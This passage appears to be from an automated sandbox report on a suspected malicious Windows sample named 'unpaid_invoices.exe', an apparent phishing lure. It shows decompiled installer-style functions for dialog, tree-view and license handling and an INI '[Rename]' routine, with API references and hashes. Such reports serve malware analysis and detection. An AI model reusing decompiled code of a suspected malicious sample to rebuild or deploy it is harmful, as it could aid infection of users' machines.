									_push(_t198);
									_push(8);
									E00405005();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t301, 0, 0);
									_v36 =  *0x7a1f80;
									_t201 =  *0x7a8ac8;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x7a8acc <= 0) {
										L86:
										if( *0x7a8b5e == 0x400) {
											InvalidateRect(_v8, 0, 1);
										}
										if( *((intOrPtr*)( *0x7a7a7c + 0x10)) != 0) {
											E00404F40(0x3ff, 0xfffffffb, E00404F58(5));
										}
										goto L90;
									}
									_t292 = _t201 + 8;
									do {
										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t207 != 0) {
											_t303 =  *_t292;
											_v72 = _t207;
											_v76 = 8;
											if((_t303 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t292[4]);
												_t292[0] = _t292[0] & 0x000000fe;
											}
											if((_t303 & 0x00000040) == 0) {
												_t211 = (_t303 & 0x00000001) + 1;
												if((_t303 & 0x00000010) != 0) {
													_t211 = _t211 + 3;
												}
											} else {
												_t211 = 3;
											}
											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageW(_v8, 0x113f, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t292 =  &(_t292[0x206]);
									} while (_v24 <  *0x7a8acc);
									goto L86;
								} else {
									_t293 = E004012E2( *0x7a1f80);
									E00401299(_t293);
									_t222 = 0;
									_t301 = 0;
									if(_t293 <= 0) {
										L74:
										SendMessageW(_v12, 0x14e, _t301, 0);
										_a16 = _t293;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
											_t301 = _t301 + 1;
										}
										_t222 = _t222 + 1;
									} while (_t222 < _t293);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t232 = SendMessageW(_v12, 0x147, 0, 0);
							if(_t232 == 0xffffffff) {
								goto L93;
							}
							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
								_t294 = 0x20;
							}
							E00401299(_t294);
							SendMessageW(_a4, 0x420, 0, _t294);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					_v20 = 2;
					 *0x7a8b00 = _t291;
					 *0x7a1f80 = GlobalAlloc(0x40,  *0x7a8acc << 2);
					_t258 = LoadImageW( *0x7a8aa0, 0x6e, 0, 0, 0, 0);
					 *0x7a1f74 =  *0x7a1f74 | 0xffffffff;
					_t297 = _t258;
					 *0x7a1f7c = SetWindowLongW(_v8, 0xfffffffc, E00405644);
					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x7a1f6c = _t260;
					ImageList_AddMasked(_t260, _t297, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x7a1f6c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t297);
					_t298 = 0;
					do {
						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
							if(_t298 != 0x20) {
								_v20 = 0;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E004066AB(_t298, 0, _t326, 0, _t266)), _t298);
						}
						_t298 = _t298 + 1;
					} while (_t298 < 0x21);
					_t299 = _a16;
					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
					_push(0x15);
					E004045CA(_a4);
					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
					_push(0x16);
					E004045CA(_a4);
					_t300 = 0;
					_v16 = 0;
					if( *0x7a8acc <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t319 = _v24 + 8;
						_v32 = _t319;
						do {
							_t278 =  &(_t319[0x10]);
							if( *_t278 != 0) {
								_v64 = _t278;
								_t279 =  *_t319;
								_v88 = _v16;
								_t311 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t311;
								_v44 = _t300;
								_v72 = _t279 & _t311;
								if((_t279 & 0x00000002) == 0) {
									if((_t279 & 0x00000004) == 0) {
										 *( *0x7a1f80 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
									} else {
										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
									_v36 = 1;
									 *( *0x7a1f80 + _t300 * 4) = _t284;
									_v16 =  *( *0x7a1f80 + _t300 * 4);
								}
							}
							_t300 = _t300 + 1;
							_t319 =  &(_v32[0x818]);
							_v32 = _t319;
						} while (_t300 <  *0x7a8acc);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004045FF(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004045FF(_v12);
								L93:
								return E00404631(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































              0x0040503e
              0x00405057
              0x0040505c
              0x00405064
              0x0040506a
              0x00405080
              0x00405083
              0x004052ae
              0x004052b5
              0x004052c9
              0x004052b7
              0x004052b9
              0x004052bc
              0x004052bd
              0x004052c4
              0x004052c4
              0x004052d5
              0x004052e3
              0x004052e6
              0x004052fc
              0x00405371
              0x00405374
              0x00405376
              0x00405380
              0x0040538e
              0x0040538e
              0x00405390
              0x0040539a
              0x004053a0
              0x004053a3
              0x004053a6
              0x004053c1
              0x004053a8
              0x004053b2
              0x004053b2
              0x004053a6
              0x0040539a
              0x00000000
              0x00405374
              0x00405301
              0x0040530c
              0x00405311
              0x00405318
              0x0040531d
              0x00405321
              0x0040532c
              0x0040532c
              0x00405330
              0x00405334
              0x00405338
              0x0040534b
              0x0040533a
              0x0040533a
              0x00405341
              0x00405347
              0x00405343
              0x00405343
              0x00405343
              0x00405341
              0x0040534f
              0x00405351
              0x00405364
              0x00405367
              0x0040536a
              0x0040536a
              0x00405334
              0x00000000
              0x00405321
              0x00405303
              0x0040530a
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x004053c4
              0x004053c4
              0x004053cb
              0x0040543c
              0x00405444
              0x0040544c
              0x0040544c
              0x00405455
              0x00405457
              0x0040545e
              0x00405461
              0x00405461
              0x00405467
              0x0040546e
              0x00405471
              0x00405471
              0x00405477
              0x0040547d
              0x00405483
              0x00405483
              0x00405490
              0x004055f1
              0x004055f8
              0x00405615
              0x0040561b
              0x0040562d
              0x0040562d
              0x00000000
              0x00405496
              0x00405498
              0x0040549d
              0x004054a2
              0x004054a7
              0x004054a9
              0x004054a9
              0x004054aa
              0x004054ab
              0x004054ad
              0x004054ad
              0x004054b5
              0x004054f6
              0x004054f8
              0x00405508
              0x0040550b
              0x00405510
              0x00405517
              0x0040551a
              0x004055bc
              0x004055c5
              0x004055cd
              0x004055cd
              0x004055db
              0x004055ec
              0x004055ec
              0x00000000
              0x004055db
              0x00405520
              0x00405523
              0x00405529
              0x0040552e
              0x00405530
              0x00405532
              0x00405538
              0x0040553f
              0x00405544
              0x0040554b
              0x0040554e
              0x0040554e
              0x00405555
              0x00405561
              0x00405565
              0x00405567
              0x00405567
              0x00405557
              0x00405559
              0x00405559
              0x00405587
              0x00405593
              0x004055a2
              0x004055a2
              0x004055a4
              0x004055a7
              0x004055b0
              0x00000000
              0x004054b7
              0x004054c2
              0x004054c5
              0x004054ca
              0x004054cc
              0x004054d0
              0x004054e0
              0x004054ea
              0x004054ec
              0x004054ef
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x004054d2
              0x004054d2
              0x004054d8
              0x004054da
              0x004054da
              0x004054db
              0x004054dc
              0x00000000
              0x004054d2
              0x004054b5
              0x00405490
              0x004053d3
              0x00000000
              0x004053e9
              0x004053f3
              0x004053f8
              0x00000000
              0x00000000
              0x0040540a
              0x0040540f
              0x0040541b
              0x0040541b
              0x0040541d
              0x0040542c
              0x0040542e
              0x00405432
              0x00405435
              0x00000000
              0x00405435
              0x004053d3
              0x00405089
              0x0040508e
              0x00405097
              0x0040509e
              0x004050b0
              0x004050bb
              0x004050c1
              0x004050cf
              0x004050e3
              0x004050e8
              0x004050f5
              0x004050fa
              0x00405110
              0x00405121
              0x0040512e
              0x0040512e
              0x00405131
              0x00405137
              0x00405139
              0x0040513c
              0x00405141
              0x00405146
              0x00405148
              0x00405148
              0x00405168
              0x00405168
              0x0040516a
              0x0040516b
              0x00405170
              0x00405176
              0x0040517a
              0x0040517f
              0x00405187
              0x0040518b
              0x00405190
              0x00405195
              0x0040519d
              0x004051a0
              0x00405270
              0x00405283
              0x00000000
              0x004051a6
              0x004051a9
              0x004051ac
              0x004051af
              0x004051af
              0x004051b5
              0x004051be
              0x004051c1
              0x004051c5
              0x004051c8
              0x004051cb
              0x004051d4
              0x004051dd
              0x004051e0
              0x004051e3
              0x004051e6
              0x00405224
              0x0040524f
              0x00405226
              0x00405235
              0x00405235
              0x004051e8
              0x004051eb
              0x004051f9
              0x00405203
              0x0040520b
              0x00405212
              0x0040521d
              0x0040521d
              0x004051e6
              0x00405255
              0x00405256
              0x00405262
              0x00405262
              0x0040526e
              0x00405289
              0x0040528c
              0x004052a9
              0x00000000
              0x0040528e
              0x00405293
              0x0040529c
              0x0040562f
              0x00405641
              0x00405641
              0x0040528c
              0x00000000
              0x0040526e
              0x004051a0

              APIs
              • GetDlgItem.USER32 ref: 0040504F
              • GetDlgItem.USER32 ref: 0040505A
              • GlobalAlloc.KERNEL32(00000040,?), ref: 004050A4
              • LoadImageW.USER32 ref: 004050BB
              • SetWindowLongW.USER32(?,000000FC,00405644), ref: 004050D4
              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E8
              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050FA
              • SendMessageW.USER32(?,00001109,00000002), ref: 00405110
              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 0040511C
              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 0040512E
              • DeleteObject.GDI32(00000000), ref: 00405131
              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040515C
              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405168
              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405203
              • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405233
                • Part of subcall function 004045FF: SendMessageW.USER32(00000028,?,00000001,0040442A), ref: 0040460D
              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405247
              • GetWindowLongW.USER32(?,000000F0), ref: 00405275
              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405283
              • ShowWindow.USER32(?,00000005), ref: 00405293
              • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040538E
              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053F3
              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405408
              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 0040542C
              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040544C
              • ImageList_Destroy.COMCTL32(?), ref: 00405461
              • GlobalFree.KERNEL32 ref: 00405471
              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054EA
              • SendMessageW.USER32(?,00001102,?,?), ref: 00405593
              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004055A2
              • InvalidateRect.USER32(?,00000000,00000001), ref: 004055CD
              • ShowWindow.USER32(?,00000000), ref: 0040561B
              • GetDlgItem.USER32 ref: 00405626
              • ShowWindow.USER32(00000000), ref: 0040562D
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.248541409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248557701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248564424.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248569044.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248819255.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248824140.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248829352.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248833606.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248843564.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248848212.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248853314.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248856925.00000000007BC000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248863093.00000000007C9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248870612.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
              • String ID: $M$N
              • API String ID: 2564846305-813528018
              • Opcode ID: 6abe7a227f943e402f923de28771de89d858ca3350371f72f3cd38ce524b5995
              • Instruction ID: 1c888212402988323542b136e78769e30209d338b2ecbb40b03ff66d659fa363
              • Opcode Fuzzy Hash: 6abe7a227f943e402f923de28771de89d858ca3350371f72f3cd38ce524b5995
              • Instruction Fuzzy Hash: 25027A70900609EFDB20DFA5CD85AAF7BB5FB85314F10812AF611BA2E1DB798951CF18
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00404789 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
              Download Yara Rule
              C-Code - Quality: 91%
              			E00404789(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				char _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x79ff54 =  *0x79ff54 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E00404631(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x7a6a40;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								_t44 =  &_v8; // 0x7a6a40
								E00404A38(_a4,  *_t44);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x7a8aa8, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x7a8aa8, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x79ff54 != 0) {
						goto L27;
					} else {
						_t116 =  *0x7a0f60 + 0x14;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004045EC(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404A14();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x7a7a7c - 4 + _t75 * 4);
				}
				_t76 =  *0x7a8ad8 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E0040473A;
				if(_t110 != 2) {
					_v8 = E00404700;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E004045CA(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E004045CA(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004045EC( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E004045FF(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x7a8ab0 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x79ff54 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x79ff54 = 0;
				return 0;
			}


















              0x0040479b
              0x004048c8
              0x00404925
              0x00404929
              0x004049f6
              0x004049f8
              0x004049f8
              0x004049fe
              0x004049fe
              0x00404a01
              0x00000000
              0x00404a08
              0x00404937
              0x0040493d
              0x00404947
              0x00404952
              0x00404955
              0x00404958
              0x00404963
              0x00404966
              0x0040496d
              0x0040497a
              0x0040498b
              0x00404991
              0x00404993
              0x00404999
              0x004049a7
              0x004049ad
              0x004049ad
              0x0040496d
              0x004049b7
              0x00000000
              0x004049c2
              0x004049c6
              0x004049d6
              0x004049d6
              0x004049dc
              0x004049e8
              0x004049e8
              0x00000000
              0x004049ec
              0x004049b7
              0x004048d3
              0x00000000
              0x004048e5
              0x004048ea
              0x004048f0
              0x00000000
              0x00000000
              0x00404919
              0x0040491b
              0x00404920
              0x00000000
              0x00404920
              0x004048d3
              0x004047a1
              0x004047a4
              0x004047a9
              0x004047ba
              0x004047ba
              0x004047c2
              0x004047c5
              0x004047c9
              0x004047cc
              0x004047d0
              0x004047d3
              0x004047d6
              0x004047d9
              0x004047e0
              0x004047e2
              0x004047e2
              0x004047ec
              0x004047f9
              0x00404803
              0x00404808
              0x0040480b
              0x00404810
              0x00404827
              0x0040482e
              0x00404841
              0x00404844
              0x00404858
              0x0040485f
              0x00404864
              0x00404869
              0x00404869
              0x00404877
              0x00404885
              0x00404897
              0x0040489c
              0x004048ac
              0x004048ae
              0x00000000

              APIs
              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404827
              • GetDlgItem.USER32 ref: 0040483B
              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404858
              • GetSysColor.USER32(?), ref: 00404869
              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404877
              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404885
              • lstrlenW.KERNEL32(?), ref: 0040488A
              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404897
              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048AC
              • GetDlgItem.USER32 ref: 00404905
              • SendMessageW.USER32(00000000), ref: 0040490C
              • GetDlgItem.USER32 ref: 00404937
              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040497A
              • LoadCursorW.USER32(00000000,00007F02), ref: 00404988
              • SetCursor.USER32(00000000), ref: 0040498B
              • LoadCursorW.USER32(00000000,00007F00), ref: 004049A4
              • SetCursor.USER32(00000000), ref: 004049A7
              • SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D6
              • SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E8
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.248541409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248557701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248564424.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248569044.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248819255.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248824140.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248829352.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248833606.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248843564.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248848212.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248853314.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248856925.00000000007BC000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248863093.00000000007C9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248870612.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
              • String ID: @jz$N
              • API String ID: 3103080414-4087404676
              • Opcode ID: 2f7aa64e3dc70d49155a5c32c4c6c2cb2c3818e72aa53dab6a0d1c61e372e6f3
              • Instruction ID: a92c684f90d09e790cb96c84d129e3e4002e0b0c6609d0ca9bf02dd30757374c
              • Opcode Fuzzy Hash: 2f7aa64e3dc70d49155a5c32c4c6c2cb2c3818e72aa53dab6a0d1c61e372e6f3
              • Instruction Fuzzy Hash: D861A2B1900209BFDB109F61DD85AAA7BA9FB85315F00803AF705B62E1C77C9D51DF98
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004062B4 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130memorystringCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E004062B4(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x7a5628 = 0x55004e;
				 *0x7a562c = 0x4c;
				if(_t44 == 0) {
					L3:
					_t2 = _t52 + 0x1c; // 0x7a5e28
					_t12 = GetShortPathNameW( *_t2, 0x7a5e28, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x7a5228, "%ls=%ls\r\n", 0x7a5628, 0x7a5e28);
						_t53 = _t52 + 0x10;
						E004066AB(_t37, 0x400, 0x7a5e28, 0x7a5e28,  *((intOrPtr*)( *0x7a8ab0 + 0x128)));
						_t12 = E0040615E(0x7a5e28, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E004061E1(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E004060C3(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E004060C3(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00406119(_t24 + _t46, 0x7a5228, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E00406210(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E0040615E(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x7a5628, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















              0x004062b4
              0x004062bd
              0x004062c4
              0x004062ce
              0x004062e2
              0x0040630a
              0x00406311
              0x00406315
              0x00406319
              0x00406339
              0x00406340
              0x0040634a
              0x00406357
              0x0040635c
              0x00406361
              0x00406365
              0x00406374
              0x00406376
              0x00406383
              0x00406387
              0x00406422
              0x00000000
              0x0040639d
              0x004063aa
              0x004063ce
              0x004063d2
              0x004063f1
              0x004063f5
              0x004063f5
              0x004063f7
              0x00406400
              0x0040640b
              0x00406416
              0x0040641c
              0x00000000
              0x0040641c
              0x004063d4
              0x004063d7
              0x004063e2
              0x004063de
              0x004063e0
              0x004063e1
              0x004063e1
              0x004063e9
              0x004063eb
              0x00000000
              0x004063eb
              0x004063b5
              0x004063bb
              0x00000000
              0x004063bb
              0x00406387
              0x00406365
              0x004062e4
              0x004062ef
              0x004062f8
              0x004062fc
              0x00000000
              0x00000000
              0x004062fc
              0x0040642d

              APIs
              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040644F,?,?), ref: 004062EF
              • GetShortPathNameW.KERNEL32 ref: 004062F8
                • Part of subcall function 004060C3: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060D3
                • Part of subcall function 004060C3: lstrlenA.KERNEL32(00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406105
              • GetShortPathNameW.KERNEL32 ref: 00406315
              • wsprintfA.USER32 ref: 00406333
              • GetFileSize.KERNEL32(00000000,00000000,007A5E28,C0000000,00000004,007A5E28,?,?,?,?,?), ref: 0040636E
              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 0040637D
              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063B5
              • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,007A5228,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 0040640B
              • GlobalFree.KERNEL32 ref: 0040641C
              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406423
                • Part of subcall function 0040615E: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\unpaid_invoices.exe,80000000,00000003), ref: 00406162
                • Part of subcall function 0040615E: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406184
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.248541409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248557701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248564424.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248569044.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248819255.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248824140.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248829352.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248833606.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248843564.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248848212.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248853314.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248856925.00000000007BC000.00000002.00000001.01000000.00000003.sdmpDownload File
